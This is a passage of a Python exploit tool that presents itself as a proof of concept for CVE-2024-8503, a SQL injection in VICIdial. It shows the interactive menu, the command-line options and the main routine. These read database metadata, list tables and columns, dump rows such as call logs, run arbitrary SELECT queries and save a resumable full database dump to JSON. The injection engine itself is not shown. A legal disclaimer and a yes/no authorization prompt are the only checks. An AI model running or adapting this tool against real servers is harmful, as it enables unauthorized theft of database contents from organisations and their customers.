            f"Number of rows to extract (max {MAX_ROW_LIMIT}) [{DEFAULT_ROW_LIMIT}]: ",
            DEFAULT_ROW_LIMIT,
        )
        data = self.scanner.extract_table_data(table, columns, limit)
        OutputFormatter.print_table_data(table, columns, data)
        if data:
            self._offer_csv_export(table, columns, data)

    def auto_extract_interactive(self):
        """Prompt for a table, discover its columns and extract its rows."""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        columns, data = self.scanner.auto_extract_table(table)
        if columns:
            self.scan_state.update_table_columns(table, columns)
        OutputFormatter.print_table_data(table, columns, data)
        # Nothing to export when no rows came back.
        if data:
            self._offer_csv_export(table, columns, data)

    def custom_query_interactive(self):
        """Prompt for a query, prefix "SELECT " if missing, and print the extracted result."""
        print("\n[!] Enter SQL query (SELECT only, no modifications)")
        query = input("Query: ").strip()
        if not query:
            print("[-] Query required")
            return
        if not query.upper().startswith('SELECT'):
            query = f"SELECT {query}"
        print(f"\n[+] Executing: {query}")
        sys.stdout.write("[+] Result: ")
        sys.stdout.flush()
        try:
            result = self.scanner.engine.extract_string(query)
            print(f"\n[+] {repr(result)}")
        except Exception as e:
            print(f"\n[-] Error: {e}")

    def view_scan_state(self):
        """Print a summary of the current scan state.

        Metadata values are shown as text, truncated to 50 characters with
        "..." only when they are actually longer.
        """
        state = self.scan_state.state
        print("\n" + "="*70)
        print("CURRENT SCAN STATE")
        print("="*70)
        print(f"Target: {self.scan_state.get_target()}")
        print(f"Last Updated: {state.get('last_updated', 'Never')}")
        print(f"\nCompleted Steps: {len(state['completed_steps'])}")
        for step in state['completed_steps']:
            print(f" ✓ {step}")
        print(f"\nMetadata Collected: {len(state['metadata_results'])}")
        for key, val in state['metadata_results'].items():
            text = val if isinstance(val, str) else str(val)
            shown = text[:50] + "..." if len(text) > 50 else text
            print(f" • {key}: {shown}")
        print(f"\nTables Found: {len(self.scan_state.get_tables())}")
        print(f"Tables with Columns: {len(state.get('table_columns', {}))}")
        print("="*70)

    def clear_scan_state_menu(self):
        """Clear scan state after an explicit 'yes' confirmation."""
        confirm = input("\nAre you sure you want to clear all scan state? (yes/no): ").strip().lower()
        if confirm == 'yes':
            self.scan_state.clear_state()
            print("[+] Scan state cleared successfully")
        else:
            print("[+] Clear operation cancelled")

    def full_scan(self):
        """Run metadata, table listing and per-table extraction, then export JSON.

        Steps already marked complete in the scan state, and columns already
        cached for a table, are reused instead of being extracted again.
        Results are written to a timestamped ``full_scan_*.json`` file.
        """
        print("\n" + "="*70)
        print("FULL SCAN - COMPREHENSIVE DATA EXTRACTION")
        print("="*70)
        print("This will extract:")
        print(" • All metadata")
        print(f" • Tables (up to {DEFAULT_TABLE_LIMIT})")
        print(f" • Columns for each table (up to {MAX_COLUMN_LIMIT} per table)")
        print(f" • Rows for each column (up to {MAX_ROW_LIMIT} per table)")
        print("\n[!] This operation is RESUMABLE - progress is saved automatically")
        print("="*70)
        confirm = input("\nProceed with full scan? (y/n): ").strip().lower()
        if confirm != 'y':
            print("[+] Full scan cancelled")
            return
        self.scan_state.set_target(self.scanner.target)
        all_results = {
            'timestamp': datetime.now().isoformat(),
            'target': self.scanner.target,
            'metadata': {},
            'tables': {}
        }
        # Step 1: Extract metadata
        if not self.scan_state.is_step_completed('metadata'):
            print("\n[STEP 1/3] Extracting metadata...")
            for name, query in self.metadata_queries.items():
                cached = self.scan_state.get_metadata(name)
                if cached:
                    print(f"[+] Using cached {name}: {cached}")
                    all_results['metadata'][name] = cached
                else:
                    result = self.scanner.extract_metadata(name, query)
                    if result:
                        self.scan_state.update_metadata(name, result)
                        all_results['metadata'][name] = result
            self.scan_state.mark_step_completed('metadata')
            OutputFormatter.print_metadata_summary(all_results['metadata'])
        else:
            print("\n[STEP 1/3] Metadata already extracted (resuming)")
            all_results['metadata'] = self.scan_state.state['metadata_results']
        # Step 2: List all tables
        if not self.scan_state.is_step_completed('tables'):
            print("\n[STEP 2/3] Listing all tables...")
            tables = self.scanner.list_tables(DEFAULT_TABLE_LIMIT)
            if tables:
                # Only mark the step complete when something was found, so an
                # empty result is retried on the next run.
                self.scan_state.update_tables(tables)
                OutputFormatter.print_table_list(tables)
                self.scan_state.mark_step_completed('tables')
        else:
            print("\n[STEP 2/3] Tables already listed (resuming)")
            tables = self.scan_state.get_tables()
            print(f"[+] Using cached {len(tables)} tables")
        # Step 3: Extract columns and data for each table
        print(f"\n[STEP 3/3] Extracting data from {len(tables)} tables...")
        print(f"[!] Limit: {MAX_COLUMN_LIMIT} columns, {MAX_ROW_LIMIT} rows per table")
        for idx, table in enumerate(tables, 1):
            print(f"\n{'='*70}")
            print(f"Processing Table {idx}/{len(tables)}: {table}")
            print(f"{'='*70}")
            # Check if columns already extracted
            cached_columns = self.scan_state.get_table_columns(table)
            if cached_columns:
                print(f"[+] Using cached columns for {table}: {cached_columns}")
                columns = cached_columns
            else:
                columns = self.scanner.get_table_columns(table, MAX_COLUMN_LIMIT)
                if columns:
                    self.scan_state.update_table_columns(table, columns)
            if not columns:
                print(f"[-] No columns found for {table}, skipping...")
                continue
            # Extract data
            data = self.scanner.extract_table_data(table, columns, MAX_ROW_LIMIT)
            if data:
                all_results['tables'][table] = {
                    'columns': columns,
                    'rows': data
                }
                OutputFormatter.print_table_data(table, columns, data)
        # Export final results
        filename = f"full_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        saved = True
        try:
            OutputFormatter.export_json(all_results, filename)
        except OSError as e:
            saved = False
            print(f"[-] Could not write {filename}: {e}")
        print("\n" + "="*70)
        print("FULL SCAN COMPLETE")
        print("="*70)
        print(f"[+] Metadata items: {len(all_results['metadata'])}")
        print(f"[+] Tables processed: {len(all_results['tables'])}")
        if saved:
            print(f"[+] Results saved to: {filename}")
        print("="*70)

    def run(self):
        """Show the main menu in a loop and dispatch the chosen action until 0 is entered."""
        actions = {
            '1': self.extract_metadata_interactive,
            '2': self.list_tables_interactive,
            '3': self.get_columns_interactive,
            '4': self.extract_data_interactive,
            '5': self.auto_extract_interactive,
            '6': self.custom_query_interactive,
            '7': self.full_scan,
            '8': self.view_scan_state,
            '9': self.clear_scan_state_menu,
        }
        while True:
            self.show_main_menu()
            choice = input("\nSelect option: ").strip()
            if choice == '0':
                print("\n[+] Exiting...")
                break
            action = actions.get(choice)
            if action is None:
                print("[-] Invalid option")
                continue
            action()
# ============================================================================
# COMMAND LINE INTERFACE
# ============================================================================
def parse_arguments():
    """Build the command-line parser and return the parsed arguments.

    Options are declared in a table and registered in order, so the
    generated --help output lists them in the same sequence as the table.

    Returns:
        argparse.Namespace: the parsed options from sys.argv.
    """
    # Epilog shown under --help; RawDescriptionHelpFormatter keeps its
    # line breaks exactly as written here.
    usage_examples = '''
Examples:
# Interactive mode
%(prog)s --url https://target.com --interactive
# Extract metadata
%(prog)s --url https://target.com --metadata db_version database db_user
# List tables
%(prog)s --url https://target.com --list-tables
# Get columns
%(prog)s --url https://target.com --get-columns call_log
# Extract table data
%(prog)s --url https://target.com --table call_log --columns uniqueid,channel --rows 3
# Auto-extract table data
%(prog)s --url https://target.com --auto-extract call_log
# Full scan (resumable)
%(prog)s --url https://target.com --full-scan
# Self-check (no network activity)
%(prog)s --self-check
LEGAL NOTICE:
This tool is for authorized security testing only. Unauthorized access
to computer systems is illegal. Obtain written permission before testing.
'''
    parser = argparse.ArgumentParser(
        description='VICIdial CVE-2024-8503 Proof of Concept Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_examples,
    )
    metadata_choices = ['db_version', 'database', 'db_user', 'hostname',
                        'db_privileges', 'table_count', 'all']
    column_limit_help = f'Number of columns (max {MAX_COLUMN_LIMIT}, default: {DEFAULT_COLUMN_LIMIT})'
    row_limit_help = f'Number of rows (max {MAX_ROW_LIMIT}, default: {DEFAULT_ROW_LIMIT})'
    # (flag, add_argument keyword options), in the order they are registered.
    argument_specs = (
        ('--url', {'help': 'Target URL'}),
        ('--path', {'default': '/VERM/VERM_AJAX_functions.php',
                    'help': 'Path to vulnerable endpoint'}),
        ('--interactive', {'action': 'store_true', 'help': 'Run in interactive mode'}),
        ('--metadata', {'nargs': '+', 'choices': metadata_choices,
                        'help': 'Extract metadata'}),
        ('--list-tables', {'action': 'store_true', 'help': 'List database tables'}),
        ('--get-columns', {'metavar': 'TABLE', 'help': 'Get columns for table'}),
        ('--column-limit', {'type': int, 'default': DEFAULT_COLUMN_LIMIT,
                            'help': column_limit_help}),
        ('--table', {'help': 'Table to extract data from'}),
        ('--columns', {'help': 'Comma-separated column names'}),
        ('--rows', {'type': int, 'default': DEFAULT_ROW_LIMIT, 'help': row_limit_help}),
        ('--auto-extract', {'metavar': 'TABLE', 'help': 'Auto-extract table data'}),
        ('--custom-query', {'help': 'Execute custom SQL query'}),
        ('--full-scan', {'action': 'store_true', 'help': 'Perform full scan (resumable)'}),
        ('--skip-vuln-check', {'action': 'store_true',
                               'help': 'Skip vulnerability verification'}),
        ('--export', {'help': 'Export results to file'}),
        ('--self-check', {'action': 'store_true',
                          'help': 'Print configuration and exit (no network)'}),
    )
    for flag, options in argument_specs:
        parser.add_argument(flag, **options)
    return parser.parse_args()
def run_self_check():
    """Print the tool's version, limits and metadata keys to stdout.

    Only module-level constants are read and printed; nothing else is
    called, so no request is sent anywhere.
    """
    metadata_keys = ', '.join(sorted(METADATA_QUERIES))
    report_lines = (
        "\n[+] Self-check (no network activity)",
        f"[+] Version: {VERSION}",
        f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}",
        f"[+] Max metadata length: {MAX_LENGTH}",
        f"[+] Max cell length: {MAX_CELL_LENGTH}",
        "[+] State file: .vicidial_scan_state.json",
        f"[+] Metadata keys: {metadata_keys}",
    )
    # One print call per line, matching the original output sequence.
    for line in report_lines:
        print(line)
def _clamp_limit(value, maximum, label):
    """Clamp a user-supplied limit into the range 1..maximum.

    Prints a notice when the requested value had to be adjusted, so the
    user can see that the documented cap was applied.

    Args:
        value: the limit requested on the command line.
        maximum: the largest value allowed.
        label: short name used in the notice (e.g. "Row").

    Returns:
        int: ``value`` restricted to the range 1..maximum.
    """
    clamped = max(1, min(value, maximum))
    if clamped != value:
        print(f"[!] {label} limit {value} is outside 1-{maximum}; using {clamped}")
    return clamped


def main():
    """Main entry point.

    Flow, in order:
      1. Print the banner and parse the command line.
      2. ``--self-check`` prints the configuration and returns.
      3. Require ``--url`` and an explicit "yes" to the authorization prompt.
      4. Load saved scan state; offer to resume when it matches the target,
         clearing the state if the user declines.
      5. Initialize the scanner; return early if initialization fails.
      6. ``--interactive`` runs the menu loop and returns; otherwise each
         requested action flag is executed in turn.
      7. Print the summary, send a notification and play the completion sound.

    ``--rows`` and ``--column-limit`` are clamped to ``MAX_ROW_LIMIT`` and
    ``MAX_COLUMN_LIMIT`` before use, matching the caps stated in --help.
    """
    start_time = time.time()
    OutputFormatter.print_banner()
    args = parse_arguments()
    if args.self_check:
        run_self_check()
        return
    if not args.url:
        print("[-] Missing required argument: --url")
        return
    print("\n[!] LEGAL DISCLAIMER:")
    print(" This tool is for AUTHORIZED SECURITY TESTING ONLY.")
    print(" Unauthorized access is ILLEGAL. Proceed only with written permission.\n")
    response = input("Do you have authorization to test this target? (yes/no): ").strip().lower()
    if response != 'yes':
        print("\n[!] Authorization required. Exiting.")
        return

    # Normalise the target once so the resume comparison and the value
    # shown to the user always agree (no doubled '/' in the display).
    target = args.url.rstrip('/') + args.path
    scan_state = ScanState()
    # Check for resumable scan
    saved_target = scan_state.get_target()
    if saved_target and saved_target == target:
        if scan_state.show_resume_prompt():
            print("[+] Resuming from previous scan...")
        else:
            scan_state.clear_state()
    print("\n[+] Initializing scanner...")
    print(f"[+] Target: {target}")
    print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}")
    scanner = VulnerabilityScanner(args.url, args.path)
    if not scanner.initialize(skip_vuln_check=args.skip_vuln_check):
        print("\n[-] Initialization failed. Exiting.")
        send_notification("VICIdial PoC", "Scan failed - initialization error")
        return
    scan_state.set_target(scanner.target)

    if args.interactive:
        interactive = InteractiveMode(scanner, scan_state)
        interactive.run()
        duration = time.time() - start_time
        print(f"\n[+] Total time: {duration/60:.1f} minutes")
        send_notification("VICIdial PoC", f"Interactive scan completed in {duration/60:.1f} minutes")
        play_completion_sound()
        return

    if args.metadata:
        results = {}
        if 'all' in args.metadata:
            queries = METADATA_QUERIES
        else:
            queries = {k: METADATA_QUERIES[k] for k in args.metadata if k in METADATA_QUERIES}
        for name, query in queries.items():
            result = scanner.extract_metadata(name, query)
            if result:
                results[name] = result
                scan_state.update_metadata(name, result)
        OutputFormatter.print_metadata_summary(results)
        if args.export:
            OutputFormatter.export_json(results, args.export)

    if args.list_tables:
        tables = scanner.list_tables()
        if tables:
            scan_state.update_tables(tables)
            OutputFormatter.print_table_list(tables)

    if args.get_columns:
        # Apply the documented column cap before handing the value on.
        column_limit = _clamp_limit(args.column_limit, MAX_COLUMN_LIMIT, "Column")
        columns = scanner.get_table_columns(args.get_columns, column_limit)
        if columns:
            scan_state.update_table_columns(args.get_columns, columns)
            OutputFormatter.print_columns_list(args.get_columns, columns)

    if args.table and args.columns:
        # Drop empty names left by stray or trailing commas ("a,,b", "a,").
        columns = [name for name in (c.strip() for c in args.columns.split(',')) if name]
        if columns:
            # Apply the documented row cap before handing the value on.
            row_limit = _clamp_limit(args.rows, MAX_ROW_LIMIT, "Row")
            data = scanner.extract_table_data(args.table, columns, row_limit)
            OutputFormatter.print_table_data(args.table, columns, data)
            if args.export:
                OutputFormatter.export_csv(columns, data, args.export)
        else:
            print("[-] --columns did not contain any column names; skipping data extraction")
    elif args.table or args.columns:
        # Previously ignored without any message when only one was given.
        print("[-] --table and --columns must be used together; skipping data extraction")

    if args.auto_extract:
        columns, data = scanner.auto_extract_table(args.auto_extract)
        if columns and data:
            scan_state.update_table_columns(args.auto_extract, columns)
            OutputFormatter.print_table_data(args.auto_extract, columns, data)
            if args.export:
                OutputFormatter.export_csv(columns, data, args.export)

    if args.custom_query:
        query = args.custom_query if args.custom_query.startswith('SELECT') else f"SELECT {args.custom_query}"
        print(f"\n[+] Executing: {query}")
        sys.stdout.write("[+] Result: ")
        sys.stdout.flush()
        try:
            result = scanner.engine.extract_string(query)
            print(f"\n[+] {repr(result)}")
        except Exception as e:
            # Best-effort: report the failure and continue with the
            # remaining requested actions.
            print(f"\n[-] Error: {e}")

    if args.full_scan:
        interactive = InteractiveMode(scanner, scan_state)
        interactive.full_scan()

    duration = time.time() - start_time
    print("\n[+] Scan complete!")
    print(f"[+] Total time: {duration/60:.1f} minutes")
    print("[+] Remember: All operations were READ-ONLY")
    print("[+] CVE-2024-8503 - CRITICAL Severity\n")
    send_notification("VICIdial PoC", f"Scan completed in {duration/60:.1f} minutes")
    play_completion_sound()
if __name__ == '__main__':
    # Script entry point: run main() and map failures to exit codes.
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C is treated as a normal, user-requested stop (status 0).
        print("\n\n[!] Interrupted by user. Exiting...")
        raise SystemExit(0)
    except Exception as error:
        # Any other failure is reported in one line and exits with status 1.
        print(f"\n[-] Unexpected error: {error}")
        raise SystemExit(1)